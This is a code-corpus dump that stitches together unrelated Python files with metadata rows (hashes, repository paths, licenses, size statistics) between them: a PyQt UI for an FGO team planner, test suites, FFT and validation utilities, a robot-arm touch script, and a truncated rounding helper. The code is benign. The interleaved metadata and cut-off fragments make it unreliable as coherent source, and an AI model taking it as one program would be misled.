self.round3_servant1_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant1_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant1_skill2.setText("")
self.round3_servant1_skill2.setIconSize(QtCore.QSize(30, 30))
self.round3_servant1_skill2.setObjectName("round3_servant1_skill2")
self.horizontalLayout_112.addWidget(self.round3_servant1_skill2)
self.round3_servant1_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant1_skill3.setEnabled(False)
self.round3_servant1_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant1_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant1_skill3.setText("")
self.round3_servant1_skill3.setIconSize(QtCore.QSize(30, 30))
self.round3_servant1_skill3.setObjectName("round3_servant1_skill3")
self.horizontalLayout_112.addWidget(self.round3_servant1_skill3)
self.gridLayout_5.addLayout(self.horizontalLayout_112, 2, 3, 1, 1)
self.verticalLayout_7.addLayout(self.gridLayout_5)
self.horizontalLayout_15.addWidget(self.groupBox_3)
self.verticalLayout_2.addLayout(self.horizontalLayout_15)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1070, 26))
self.menubar.setObjectName("menubar")
self.menu = QtWidgets.QMenu(self.menubar)
self.menu.setObjectName("menu")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.action_update = QtWidgets.QAction(MainWindow)
self.action_update.setObjectName("action_update")
self.action_mooncell = QtWidgets.QAction(MainWindow)
self.action_mooncell.setObjectName("action_mooncell")
self.action_support = QtWidgets.QAction(MainWindow)
self.action_support.setObjectName("action_support")
self.action_kazemai = QtWidgets.QAction(MainWindow)
self.action_kazemai.setObjectName("action_kazemai")
self.action_about = QtWidgets.QAction(MainWindow)
self.action_about.setObjectName("action_about")
self.menu.addAction(self.action_update)
self.menu.addAction(self.action_support)
self.menu.addAction(self.action_about)
self.menu.addSeparator()
self.menu.addAction(self.action_mooncell)
self.menu.addAction(self.action_kazemai)
self.menubar.addAction(self.menu.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "FGO周回组队器"))
self.label_costume_state_4.setText(_translate("MainWindow", "等级: "))
self.label_servant_state_2.setText(_translate("MainWindow", "技能: \n"
"宝具: \n"
"等级: \n"
"芙芙:"))
self.label_costume_state_1.setText(_translate("MainWindow", "等级: "))
self.box_skill_confirm.setText(_translate("MainWindow", "技能提示"))
self.label.setText(_translate("MainWindow", "概率阈值:"))
self.label_costume_state_5.setText(_translate("MainWindow", "等级: "))
self.label_costume_state_6.setText(_translate("MainWindow", "等级: "))
self.label_servant_state_1.setText(_translate("MainWindow", "技能: \n"
"宝具: \n"
"等级: \n"
"芙芙:"))
self.label_master_state.setText(_translate("MainWindow", "等级:"))
self.label_costume_state_2.setText(_translate("MainWindow", "等级: "))
self.label_servant_state_3.setText(_translate("MainWindow", "技能: \n"
"宝具: \n"
"等级: \n"
"芙芙:"))
self.label_servant_state_5.setText(_translate("MainWindow", "技能: \n"
"宝具: \n"
"等级: \n"
"芙芙:"))
self.label_costume_state_3.setText(_translate("MainWindow", "等级: "))
self.label_servant_state_4.setText(_translate("MainWindow", "技能: \n"
"宝具: \n"
"等级: \n"
"芙芙:"))
self.label_servant_state_6.setText(_translate("MainWindow", "技能: \n"
"宝具: \n"
"等级: \n"
"芙芙:"))
self.btn_set_progress.setText(_translate("MainWindow", "选择进度"))
self.btn_choose_level.setText(_translate("MainWindow", "设置副本"))
self.btn_confirm_team.setText(_translate("MainWindow", "确 认"))
self.btn_change_team.setText(_translate("MainWindow", "修 改"))
self.btn_round_reset.setText(_translate("MainWindow", "撤 销"))
self.round1_label_random.setText(_translate("MainWindow", "随机数: 0.9"))
self.round1_servant2_np.setText(_translate("MainWindow", "宝具: 0%"))
self.round1_servant3_np.setText(_translate("MainWindow", "宝具: 0%"))
self.btn_round1_next.setText(_translate("MainWindow", "下一回合"))
self.round1_servant1_np.setText(_translate("MainWindow", "宝具: 0%"))
self.round2_servant3_np.setText(_translate("MainWindow", "宝具: 0%"))
self.round2_servant1_np.setText(_translate("MainWindow", "宝具: 0%"))
self.btn_round2_next.setText(_translate("MainWindow", "下一回合"))
self.round2_servant2_np.setText(_translate("MainWindow", "宝具: 0%"))
self.round2_label_random.setText(_translate("MainWindow", "随机数: 0.9"))
self.round3_servant3_np.setText(_translate("MainWindow", "宝具: 0%"))
self.round3_servant1_np.setText(_translate("MainWindow", "宝具: 0%"))
self.round3_servant2_np.setText(_translate("MainWindow", "宝具: 0%"))
self.btn_output_strategy.setText(_translate("MainWindow", "输出操作"))
self.round3_label_random.setText(_translate("MainWindow", "随机数: 0.9"))
self.menu.setTitle(_translate("MainWindow", "选 项"))
self.action_update.setText(_translate("MainWindow", "数据库更新"))
self.action_mooncell.setText(_translate("MainWindow", "Mooncell"))
self.action_support.setText(_translate("MainWindow", "软件更新"))
self.action_kazemai.setText(_translate("MainWindow", "茹西教王的理想乡"))
self.action_about.setText(_translate("MainWindow", "关于软件"))
| 64.746904
| 106
| 0.748927
| 83,713
| 0.997118
| 0
| 0
| 0
| 0
| 0
| 0
| 5,803
| 0.06912
|
fbf8146cd8db52170f45b639efbed1ee6e4abd99
| 1,177
|
py
|
Python
|
pyhutool/core/Io.py
|
kaysen820/PyHuTool
|
4de4c42a8dc499e22816ebbb3293897ee2b505f1
|
[
"BSD-3-Clause"
] | null | null | null |
pyhutool/core/Io.py
|
kaysen820/PyHuTool
|
4de4c42a8dc499e22816ebbb3293897ee2b505f1
|
[
"BSD-3-Clause"
] | null | null | null |
pyhutool/core/Io.py
|
kaysen820/PyHuTool
|
4de4c42a8dc499e22816ebbb3293897ee2b505f1
|
[
"BSD-3-Clause"
] | null | null | null |
class File:
@staticmethod
def tail(self, file_path, lines=10):
with open(file_path, 'rb') as f:
total_lines_wanted = lines
block_size = 1024
f.seek(0, 2)
block_end_byte = f.tell()
lines_to_go = total_lines_wanted
block_number = -1
blocks = []
while lines_to_go > 0 and block_end_byte > 0:
if block_end_byte - block_size > 0:
f.seek(block_number * block_size, 2)
block = f.read(block_size)
else:
f.seek(0, 0)
block = f.read(block_end_byte)
lines_found = block.count(b'\n')
lines_to_go -= lines_found
block_end_byte -= block_size
block_number -= 1
blocks.append(block)
all_read_text = b''.join(blocks)
lines_found = all_read_text.count(b'\n')
if lines_found > total_lines_wanted:
return all_read_text.split(b'\n')[-total_lines_wanted:][:-1]
else:
return all_read_text.split(b'\n')[-lines_found:]
| 40.586207
| 76
| 0.507222
| 1,177
| 1
| 0
| 0
| 1,161
| 0.986406
| 0
| 0
| 27
| 0.02294
|
fbf8cddf274b4edc3f9ca19f3358df84f5395fdb
| 4,122
|
py
|
Python
|
utils/argparse.py
|
toytag/self-supervised-learning-for-semantic-segmentation
|
b3326df6d1fa045fabb27fc30542313adee00d30
|
[
"MIT"
] | null | null | null |
utils/argparse.py
|
toytag/self-supervised-learning-for-semantic-segmentation
|
b3326df6d1fa045fabb27fc30542313adee00d30
|
[
"MIT"
] | null | null | null |
utils/argparse.py
|
toytag/self-supervised-learning-for-semantic-segmentation
|
b3326df6d1fa045fabb27fc30542313adee00d30
|
[
"MIT"
] | null | null | null |
import argparse
class ArchParser(argparse.ArgumentParser):
def __init__(self, model_names, *args, **kwargs):
super().__init__(*args, **kwargs)
self.add_argument('-a', '--arch', metavar='ARCH', choices=model_names,
help='model architecture: ' + ' | '.join(model_names))
class BasicParser(argparse.ArgumentParser):
def __init__(self, description='PyTorch Segmentation Pretraining', **kwargs):
super().__init__(description=description, **kwargs)
self.add_argument('data_root', metavar='DIR', help='path to dataset')
self.add_argument('--work-dir', default='./', metavar='DIR',
help='path to work directory (default: ./)')
self.add_argument('--workers', default=32, type=int, metavar='N',
help='number of data loading workers (default: 32)')
self.add_argument('--epochs', default=200, type=int, metavar='N',
help='number of total epochs to run (default: 200)')
self.add_argument('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
self.add_argument('--crop-size', default=512, type=int,
help='augmentation crop size (default: 512)')
self.add_argument('--batch-size', default=256, type=int, metavar='N',
help='mini-batch size (default: 256), this is the total '
'batch size of all GPUs on the current node when '
'using Data Parallel or Distributed Data Parallel')
self.add_argument('--base-lr', default=0.01, type=float, metavar='LR',
help='initial learning rate', dest='base_lr')
self.add_argument('--momentum', default=0.9, type=float, metavar='M',
help='momentum of SGD solver')
self.add_argument('--wd', '--weight-decay', default=1e-4, type=float, metavar='W',
help='weight decay (default: 1e-4)', dest='weight_decay')
self.add_argument('--print-freq', default=10, type=int, metavar='N',
help='print frequency (default: 10 iters)')
self.add_argument('--checkpoint-freq', default=10, type=int, metavar='N',
help='checkpoint frequency (default: 10 epochs)')
self.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
self.add_argument('--pretrained', default='', type=str, metavar='PATH',
help='path to init checkpoint (default: none)')
self.add_argument('--world-size', default=-1, type=int,
help='number of nodes for distributed training')
self.add_argument('--rank', default=-1, type=int,
help='node rank for distributed training')
self.add_argument('--dist-url', default='tcp://localhost:29500', type=str,
help='url used to set up distributed training')
self.add_argument('--dist-backend', default='nccl',
type=str, help='distributed backend')
self.add_argument('--seed', default=None, type=int,
help='seed for initializing training.')
self.add_argument('--gpu', default=None,
type=int, help='GPU id to use.')
self.add_argument('--multiprocessing-distributed', action='store_true',
help='Use multi-processing distributed training to launch '
'N processes per node, which has N GPUs. This is the '
'fastest way to use PyTorch for either single node or '
'multi node data parallel training')
self.add_argument('--fp16', action='store_true',
help='mixed percision training')
self.add_argument('--update-interval', default=1,
type=int, help='gradient update interval')
| 64.40625
| 90
| 0.566715
| 4,100
| 0.994663
| 0
| 0
| 0
| 0
| 0
| 0
| 1,584
| 0.384279
|
fbf9c31021598e1cfc750b4e1fb2c63076b4d3ce
| 2,401
|
py
|
Python
|
finicky/schema.py
|
yaaminu/yaval
|
32f04ecfa092c978fc026f6b7f58d6cf2defd8c9
|
[
"MIT"
] | 14
|
2021-02-12T19:04:21.000Z
|
2021-03-12T18:18:09.000Z
|
finicky/schema.py
|
yaaminu/yaval
|
32f04ecfa092c978fc026f6b7f58d6cf2defd8c9
|
[
"MIT"
] | 5
|
2021-02-12T16:04:37.000Z
|
2021-04-14T12:05:02.000Z
|
finicky/schema.py
|
yaaminu/yaval
|
32f04ecfa092c978fc026f6b7f58d6cf2defd8c9
|
[
"MIT"
] | null | null | null |
from finicky.validators import ValidationException
def validate(schema, data, hook=None):
"""
Given an input named `data` validate it against `schema` returning errors encountered if any and the input data.
It's important to note that, validation continues even if an error is encountered.
:param schema: The schema against which the input should be validated. A schema is essentially a mapping of field
names and their corresponding validators. The keys must match exactly to fields in the input data.
Pyval comes with a set of standard validators defined in `finicky.validators` but you can write your own
if your need a more customized one.
A validator is a function which takes in a single argument and returns the validated
data on success. On failure, it must raise a `finicky.validators.ValidationException`. To illustrate in code:
```
def my_custom_batch_no_validator(input):
if not input:
raise ValidationException("This field is required")
elif not input.contains("prefix_")
raise ValidationException("This field must start with `prefix_`")
else:
# you can modify the value, like striping off whitespace, rounding up the number etc
return input.strip()
```
:param data: The input data to be validated, cannot be none
:param hook: An optional custom hook function that shall be invoked when all fields have passed validation. It is
especially useful in situations where the validity of the input also conditionally relies on multiple
fields. it takes as an input, the newly validated data and must return the input on success
or raise a `finicky.validators.ValidationException` on failure. This hook may modify the input before
returning it.
:return: A tuple of the form (errors:str[], validated_data)
"""
errors = {}
validated_data = {}
for key in schema:
try:
validated_data[key] = schema[key](data.get(key))
except ValidationException as e:
errors[key] = e.errors
if hook and not errors:
try:
validated_data = hook(validated_data)
except ValidationException as e:
errors["___hook"] = e.errors
return errors, validated_data
__all__ = ("validate",)
| 49
| 118
| 0.678051
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,877
| 0.781758
|
fbfb1bbd5566de1b6744d8dee7be28df74fd818c
| 3,194
|
py
|
Python
|
tests/unique_test.py
|
yohplala/vaex
|
ca7927a19d259576ca0403ee207a597aaef6adc2
|
[
"MIT"
] | null | null | null |
tests/unique_test.py
|
yohplala/vaex
|
ca7927a19d259576ca0403ee207a597aaef6adc2
|
[
"MIT"
] | null | null | null |
tests/unique_test.py
|
yohplala/vaex
|
ca7927a19d259576ca0403ee207a597aaef6adc2
|
[
"MIT"
] | null | null | null |
from common import small_buffer
import pytest
import numpy as np
import pyarrow as pa
import vaex
def test_unique_arrow(df_factory):
ds = df_factory(x=vaex.string_column(['a', 'b', 'a', 'a', 'a', 'b', 'b', 'b', 'b', 'a']))
with small_buffer(ds, 2):
assert set(ds.unique(ds.x)) == {'a', 'b'}
values, index = ds.unique(ds.x, return_inverse=True)
assert np.array(values)[index].tolist() == ds.x.tolist()
def test_unique(df_factory):
ds = df_factory(colors=['red', 'green', 'blue', 'green'])
with small_buffer(ds, 2):
assert set(ds.unique(ds.colors)) == {'red', 'green', 'blue'}
values, index = ds.unique(ds.colors, return_inverse=True)
assert np.array(values)[index].tolist() == ds.colors.tolist()
ds = df_factory(x=['a', 'b', 'a', 'a', 'a', 'b', 'b', 'b', 'b', 'a'])
with small_buffer(ds, 2):
assert set(ds.unique(ds.x)) == {'a', 'b'}
values, index = ds.unique(ds.x, return_inverse=True)
assert np.array(values)[index].tolist() == ds.x.tolist()
def test_unique_f4(df_factory):
x = np.array([np.nan, 0, 1, np.nan, 2, np.nan], dtype='f4')
df = df_factory(x=x)
assert list(sorted(df.x.unique()))[1:] == [np.nan, 0, 1, 2][1:]
def test_unique_nan(df_factory):
x = [np.nan, 0, 1, np.nan, 2, np.nan]
df = df_factory(x=x)
assert list(sorted(df.x.unique()))[1:] == [np.nan, 0, 1, 2][1:]
with small_buffer(df, 2):
values, indices = df.unique(df.x, return_inverse=True)
values = np.array(values)
values = values[indices]
mask = np.isnan(values)
assert values[~mask].tolist() == df.x.to_numpy()[~mask].tolist()
# assert indices.tolist() == [0, 1, 2, 0, 3, 0]
def test_unique_missing(df_factory):
# Create test databn
x = np.array([None, 'A', 'B', -1, 0, 2, '', '', None, None, None, np.nan, np.nan, np.nan, np.nan])
df = df_factory(x=x)
uniques = df.x.unique(dropnan=True)
assert set(uniques) == set(['', 'A', 'B', -1, 0, 2, None])
def test_unique_missing_numeric(array_factory):
df = vaex.from_arrays(x=array_factory([1, None]))
values = df.x.unique()
assert set(values) == {1, None}
# assert list(sorted(df.x.unique()))[1:] == [np.nan, 0, 1, 2][1:]
def test_unique_string_missing(df_factory):
x = ['John', None, 'Sally', None, '0.0']
df = df_factory(x=x)
result = df.x.unique()
assert len(result) == 4
assert'John' in result
assert None in result
assert 'Sally'
def test_unique_list(df_types):
df = df_types
assert set(df.string_list.unique()) == {'aap', 'noot', 'mies', None}
assert set(df.int_list.unique()) == {1, 2, 3, 4, 5, None}
@pytest.mark.parametrize("future", [False, True])
def test_unique_categorical(df_factory, future):
df = df_factory(x=vaex.string_column(['a', 'c', 'b', 'a', 'a']))
df = df.ordinal_encode('x')
df = df._future() if future else df
if future:
assert df.x.dtype == str
assert set(df.x.unique()) == {'a', 'b', 'c'}
assert df.x.nunique() == 3
else:
assert df.x.dtype == int
assert set(df.x.unique()) == {0, 1, 2}
assert df.x.nunique() == 3
| 33.270833
| 102
| 0.584534
| 0
| 0
| 0
| 0
| 500
| 0.156544
| 0
| 0
| 352
| 0.110207
|
fbfb4b2b18ec51f6264b25bae8ef574c623943f4
| 810
|
py
|
Python
|
utils/utilsFreq.py
|
geobook2015/magPy
|
af0f31fc931786ac6f8d69a5290366418035859d
|
[
"Apache-2.0"
] | 1
|
2021-05-19T18:29:15.000Z
|
2021-05-19T18:29:15.000Z
|
utils/utilsFreq.py
|
geobook2015/magPy
|
af0f31fc931786ac6f8d69a5290366418035859d
|
[
"Apache-2.0"
] | null | null | null |
utils/utilsFreq.py
|
geobook2015/magPy
|
af0f31fc931786ac6f8d69a5290366418035859d
|
[
"Apache-2.0"
] | 2
|
2021-06-03T01:59:02.000Z
|
2021-07-03T07:47:10.000Z
|
# utility functions for frequency related stuff
import numpy as np
import numpy.fft as fft
import math
def getFrequencyArray(fs, samples):
# frequencies go from to nyquist
nyquist = fs/2
return np.linspace(0, nyquist, samples)
# use this function for all FFT calculations
# then if change FFT later (i.e. FFTW), just replace one function
def forwardFFT(data, **kwargs):
if "norm" in kwargs and not kwargs["norm"]:
return fft.rfft(data, axis=0)
return fft.rfft(data, norm='ortho', axis=0)
def inverseFFT(data, length, **kwargs):
if "norm" in kwargs and not kwargs["norm"]:
return fft.irfft(data, n=length)
return fft.irfft(data, n=length, norm='ortho')
def padNextPower2(size):
next2Power = math.ceil(math.log(size,2))
next2Size = math.pow(2, int(next2Power))
return int(next2Size) - size
| 27.931034
| 65
| 0.728395
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 228
| 0.281481
|
fbfbfe77a095f3da5c436ccb64b9b59f084a3b2c
| 2,329
|
py
|
Python
|
tools/extract_keywords.py
|
bitdotioinc/pglast
|
da4c0b1c237aad98894179af9cd29e044d526ba8
|
[
"PostgreSQL"
] | null | null | null |
tools/extract_keywords.py
|
bitdotioinc/pglast
|
da4c0b1c237aad98894179af9cd29e044d526ba8
|
[
"PostgreSQL"
] | null | null | null |
tools/extract_keywords.py
|
bitdotioinc/pglast
|
da4c0b1c237aad98894179af9cd29e044d526ba8
|
[
"PostgreSQL"
] | null | null | null |
# -*- coding: utf-8 -*-
# :Project: pglast -- Extract keywords from PostgreSQL header
# :Created: dom 06 ago 2017 23:34:53 CEST
# :Author: Lele Gaifax <lele@metapensiero.it>
# :License: GNU General Public License version 3 or later
# :Copyright: © 2017, 2018 Lele Gaifax
#
from collections import defaultdict
from os.path import basename
from pprint import pformat
from re import match
import subprocess
HEADER = """\
# -*- coding: utf-8 -*-
# :Project: pglast -- DO NOT EDIT: automatically extracted from %s @ %s
# :Author: Lele Gaifax <lele@metapensiero.it>
# :License: GNU General Public License version 3 or later
# :Copyright: © 2017 Lele Gaifax
#
"""
def get_libpg_query_version():
result = subprocess.check_output(['git', 'describe', '--all', '--long'],
cwd='libpg_query')
return result.decode('utf-8').strip().split('/')[-1]
def extract_keywords(source):
for line in source.splitlines():
if line.startswith('PG_KEYWORD'):
m = match(r'PG_KEYWORD\("([^"]+)",[^,]+,\s*([\w_]+)\)', line.strip())
if m:
yield m.group(1), m.group(2)
def workhorse(args):
with open(args.header, encoding='utf-8') as f:
source = f.read()
bytype = defaultdict(set)
for keyword, type in extract_keywords(source):
bytype[type].add(keyword)
with open(args.output, 'w', encoding='utf-8') as output:
output.write(HEADER % (basename(args.header), get_libpg_query_version()))
for type in sorted(bytype):
output.write('\n')
output.write(type + 'S')
output.write(' = {')
keywords = pformat(bytype[type], compact=True, indent=len(type)+5, width=95)
output.write(keywords[1:].lstrip())
output.write('\n')
def main():
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
parser = ArgumentParser(description="PG keyword extractor",
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('header',
help="source header to be processed")
parser.add_argument('output',
help="Python source to be created")
args = parser.parse_args()
workhorse(args)
if __name__ == '__main__':
main()
| 30.246753
| 88
| 0.613568
| 0
| 0
| 253
| 0.108537
| 0
| 0
| 0
| 0
| 778
| 0.333762
|
fbfc768e9b9032e8d1b05f89ef3578bc75d58172
| 1,913
|
py
|
Python
|
tests/vi/test_indent_text_object.py
|
trishume/VintageousPlus
|
1dd62435138234979fe5bb413e1731119b017daf
|
[
"MIT"
] | 6
|
2017-04-01T05:30:08.000Z
|
2017-04-05T14:17:40.000Z
|
tests/vi/test_indent_text_object.py
|
trishume/VintageousPlus
|
1dd62435138234979fe5bb413e1731119b017daf
|
[
"MIT"
] | 1
|
2017-04-04T06:47:13.000Z
|
2017-04-04T14:26:32.000Z
|
tests/vi/test_indent_text_object.py
|
trishume/VintageousPlus
|
1dd62435138234979fe5bb413e1731119b017daf
|
[
"MIT"
] | null | null | null |
from collections import namedtuple
from sublime import Region as R
from VintageousPlus.tests import set_text
from VintageousPlus.tests import add_sel
from VintageousPlus.tests import ViewTest
from VintageousPlus.vi.text_objects import find_indent_text_object
test = namedtuple('simple_test', 'content start expected expected_inclusive msg')
# cursor is at "|"
TESTS_INDENT = (
test(start=R(37, 37), expected=R(29, 62), expected_inclusive=R(29, 62), msg='should find indent', content='''
# a comment
def a_ruby_block
some_c|all
another_one
yerp
end'''.lstrip()),
test(start=R(37, 37), expected=R(29, 41), expected_inclusive=R(29, 80), msg='should find indent when there\'s a blank line', content='''
# a comment
def a_ruby_block
some_c|all
another_one_with(blank_line)
yerp
end'''.lstrip()),
test(start=R(42, 42), expected=R(34, 57), expected_inclusive=R(34, 58), msg='should work with pyhton-ey functions', content='''
# a python thing
def a_python_fn:
some_c|all()
what()
a_python_fn'''.lstrip()),
test(start=R(57, 57), expected=R(57, 57), expected_inclusive=R(57, 57), msg='should ignore when triggered on a whitespace-only line', content='''
# a python thing
def a_python_fn:
some_call()
what()
a_python_fn'''.lstrip()),
)
class Test_indent(ViewTest):
def clear_selected_regions(self):
self.view.sel().clear()
def testAll(self):
for (i, data) in enumerate(TESTS_INDENT):
self.clear_selected_regions()
self.write(data.content)
for inclusive in [True, False]:
start, end = find_indent_text_object(self.view, data.start, inclusive)
actual = R(start, end)
msg = "failed at test index {0}: {1}".format(i, data.msg)
expected = data.expected_inclusive if inclusive else data.expected
self.assertEqual(expected, actual, msg)
| 28.552239
| 149
| 0.681652
| 636
| 0.332462
| 0
| 0
| 0
| 0
| 0
| 0
| 587
| 0.306848
|
fbfd008303bf64141666afab184cb7b1413f62e6
| 1,417
|
py
|
Python
|
example_write_camera_frames_to_hdf5.py
|
mihsamusev/pytrl_demo
|
411a74cb5f3601f03438f608b4cf8e451a88345e
|
[
"MIT"
] | null | null | null |
example_write_camera_frames_to_hdf5.py
|
mihsamusev/pytrl_demo
|
411a74cb5f3601f03438f608b4cf8e451a88345e
|
[
"MIT"
] | null | null | null |
example_write_camera_frames_to_hdf5.py
|
mihsamusev/pytrl_demo
|
411a74cb5f3601f03438f608b4cf8e451a88345e
|
[
"MIT"
] | null | null | null |
import cv2
from imutils.paths import list_images
import imutils
import re
import datetime
from datasets.hdf5datasetwriter import HDF5DatasetWriter
import progressbar
def get_frame_number(impath):
return int(re.search(r"image data (\d+)", impath).group(1))
def get_timestamp(impath):
"assuming that the timestamp is a part of the image name"
date_str = impath.split(".")[0]
date_str = re.split(r"image data \d+ ", date_str)[1]
date = datetime.datetime.strptime(date_str, '%Y-%b-%d %H %M %S %f')
return date
# Load the data, sort by frame number
basePath = "D:/create lidar trafik data/newer data/ImageData/"
impaths = list(list_images(basePath))
impaths = sorted(impaths, key=get_frame_number)
print("[INFO] building HDF5 dataset...")
outputPath = basePath + "frames.hdf5"
writer = HDF5DatasetWriter((len(impaths), 360, 640, 3), outputPath)
# initialize the progress bar
widgets = ["Building Dataset: ", progressbar.Percentage(), " ",
progressbar.Bar(), " ", progressbar.ETA()]
pbar = progressbar.ProgressBar(maxval=len(impaths),
widgets=widgets).start()
for i, impath in enumerate(impaths):
date = get_timestamp(impath)
ts = (date - datetime.datetime(1970, 1, 1)) / datetime.timedelta(seconds=1)
image = cv2.imread(impath)
image = imutils.resize(image, width=640)
writer.add([image], [ts])
pbar.update(i)
# close the HDF5 writer
pbar.finish()
writer.close()
| 31.488889
| 79
| 0.715596
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 331
| 0.233592
|
fbfd2e30f614a3b655c2662e8c6213275af8c2ac
| 4,378
|
py
|
Python
|
touch.py
|
mendelmaker/dipn
|
a4871ecf2e4eeb40ff3b7945150c255802694609
|
[
"BSD-2-Clause"
] | 8
|
2020-11-17T16:55:34.000Z
|
2021-04-28T09:24:37.000Z
|
touch.py
|
mendelmaker/dipn
|
a4871ecf2e4eeb40ff3b7945150c255802694609
|
[
"BSD-2-Clause"
] | null | null | null |
touch.py
|
mendelmaker/dipn
|
a4871ecf2e4eeb40ff3b7945150c255802694609
|
[
"BSD-2-Clause"
] | 8
|
2021-07-05T05:10:17.000Z
|
2022-03-02T12:10:25.000Z
|
#!/usr/bin/env python
import matplotlib.pyplot as plt
import numpy as np
import time
import cv2
from real.camera import Camera
from robot import Robot
from subprocess import Popen, PIPE
def get_camera_to_robot_transformation(camera):
color_img, depth_img = camera.get_data()
cv2.imwrite("real/temp.jpg", color_img)
p = Popen(['./real/detect-from-file', "real/temp.jpg"], stdin=PIPE, stdout=PIPE, stderr=PIPE)
output, err = p.communicate()
tag_info = output.decode("utf-8")
tag_info = tag_info.split("\n")[:4]
for i, info in enumerate(tag_info):
tag_info[i] = info.split(" ")
print(tag_info)
tag_info = np.array(tag_info, dtype=np.float32)
assert(tag_info.shape == (4, 3))
tag_loc_camera = tag_info
tag_loc_robot = {
22: (270.15 / 1000, -637.0 / 1000),
7: (255.35 / 1000, -247.6 / 1000),
4: (-272.7 / 1000, -660.9 / 1000),
2: (-289.8 / 1000, -274.2 / 1000)
}
camera_to_robot = cv2.getPerspectiveTransform(
np.float32([tag[1:] for tag in tag_loc_camera]),
np.float32([tag_loc_robot[tag[0]] for tag in tag_loc_camera]))
return camera_to_robot
# User options (change me)
# --------------- Setup options ---------------
tcp_host_ip = '100.127.7.223' # IP and port to robot arm as TCP client (UR5)
tcp_host_ip = "172.19.97.157"
tcp_port = 30002
rtc_host_ip = '100.127.7.223' # IP and port to robot arm as real-time client (UR5)
rtc_host_ip = "172.19.97.157"
rtc_port = 30003
# Cols: min max, Rows: x y z (define workspace limits in robot coordinates)
workspace_limits = np.asarray([[0.3, 0.748], [-0.224, 0.224], [-0.255, -0.1]])
workspace_limits = np.asarray([[-0.237, 0.211], [-0.683, -0.235], [0.18, 0.4]])
# workspace_limits = np.asarray([[-0.224, 0.224], [-0.674, -0.226], [0.18, 0.4]])
# Cols: min max, Rows: x y z (define workspace limits in robot coordinates)
tool_orientation = [2.22, -2.22, 0]
tool_orientation = [0, -3.14, 0]
# ---------------------------------------------
# Move robot to home pose
robot = Robot(False, None, None, workspace_limits,
tcp_host_ip, tcp_port, rtc_host_ip, rtc_port,
False, None, None)
robot.open_gripper()
transformation_matrix = get_camera_to_robot_transformation(robot.camera)
# Slow down robot
robot.joint_acc = 1.4
robot.joint_vel = 1.05
# Callback function for clicking on OpenCV window
click_point_pix = ()
camera_color_img, camera_depth_img = robot.get_camera_data()
def mouseclick_callback(event, x, y, flags, param):
if event == cv2.EVENT_LBUTTONDOWN:
global camera, robot, click_point_pix
click_point_pix = (x, y)
# Get click point in camera coordinates
# click_z = camera_depth_img[y][x] * robot.cam_depth_scale
# click_x = np.multiply(x-robot.cam_intrinsics[0][2],click_z/robot.cam_intrinsics[0][0])
# click_y = np.multiply(y-robot.cam_intrinsics[1][2],click_z/robot.cam_intrinsics[1][1])
# if click_z == 0:
# return
# click_point = np.asarray([click_x,click_y,click_z])
# click_point.shape = (3,1)
# # Convert camera to robot coordinates
# # camera2robot = np.linalg.inv(robot.cam_pose)
# camera2robot = robot.cam_pose
# target_position = np.dot(camera2robot[0:3,0:3],click_point) + camera2robot[0:3,3:]
# target_position = target_position[0:3,0]
# print(target_position)
camera_pt = np.array([x, y, 1])
robot_pt = np.dot(transformation_matrix, camera_pt)
robot_pt = np.array([robot_pt[0], robot_pt[1]]) / robot_pt[2]
print([robot_pt[0], robot_pt[1], -0.1])
print(robot.parse_tcp_state_data(robot.get_state(), "cartesian_info"))
robot.move_to([robot_pt[0], robot_pt[1], 0.3], tool_orientation)
# Show color and depth frames
cv2.namedWindow('color')
cv2.setMouseCallback('color', mouseclick_callback)
cv2.namedWindow('depth')
while True:
camera_color_img, camera_depth_img = robot.get_camera_data()
bgr_data = cv2.cvtColor(camera_color_img, cv2.COLOR_RGB2BGR)
if len(click_point_pix) != 0:
bgr_data = cv2.circle(bgr_data, click_point_pix, 7, (0, 0, 255), 2)
cv2.imshow('color', bgr_data)
camera_depth_img[camera_depth_img < 0.19] = 0
cv2.imshow('depth', camera_depth_img)
if cv2.waitKey(1) == ord('c'):
break
cv2.destroyAllWindows()
| 35.885246
| 97
| 0.653952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,424
| 0.325263
|
fbfd539734cc022db7b79f3a3d092f8d88fe0ee4
| 3,708
|
py
|
Python
|
py/WB-Klein/5/5.4_cc.py
|
kassbohm/wb-snippets
|
f1ac5194e9f60a9260d096ba5ed1ce40b844a3fe
|
[
"MIT"
] | null | null | null |
py/WB-Klein/5/5.4_cc.py
|
kassbohm/wb-snippets
|
f1ac5194e9f60a9260d096ba5ed1ce40b844a3fe
|
[
"MIT"
] | null | null | null |
py/WB-Klein/5/5.4_cc.py
|
kassbohm/wb-snippets
|
f1ac5194e9f60a9260d096ba5ed1ce40b844a3fe
|
[
"MIT"
] | null | null | null |
# Header starts here.
from sympy.physics.units import *
from sympy import *
# Rounding:
import decimal
from decimal import Decimal as DX
from copy import deepcopy
def iso_round(obj, pv, rounding=decimal.ROUND_HALF_EVEN):
import sympy
"""
Rounding acc. to DIN EN ISO 80000-1:2013-08
place value = Rundestellenwert
"""
assert pv in set([
# place value # round to:
1, # 1
0.1, # 1st digit after decimal
0.01, # 2nd
0.001, # 3rd
0.0001, # 4th
0.00001, # 5th
0.000001, # 6th
0.0000001, # 7th
0.00000001, # 8th
0.000000001, # 9th
0.0000000001, # 10th
])
